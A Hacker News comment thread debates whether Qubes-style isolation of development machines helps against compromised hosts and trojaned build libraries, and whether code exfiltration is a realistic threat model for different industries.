Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

i wonder if making the development machine use something similar to qubes (https://www.qubes-os.org/) by default works.

Also, if a compromised machine on the internal network destroys your company's security assumptions, then there must not have much defense in depth.



qubes-like solutions are great at preventing malicious code from accessing your internal websites, but pretty useless from "code leak" perspective.

If you have downloaded a trojaned "super library" and put it to your build process, it will, by definition, be in the same security domain as your source code.

Unless you audit all file accesses and outgoing internet access, you won't be able to prevent code exfiltration.


is code exfiltration really the threat model though?


Depends on whether you work on a product or in IT. For products in certain industries, yes, it is a concern.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: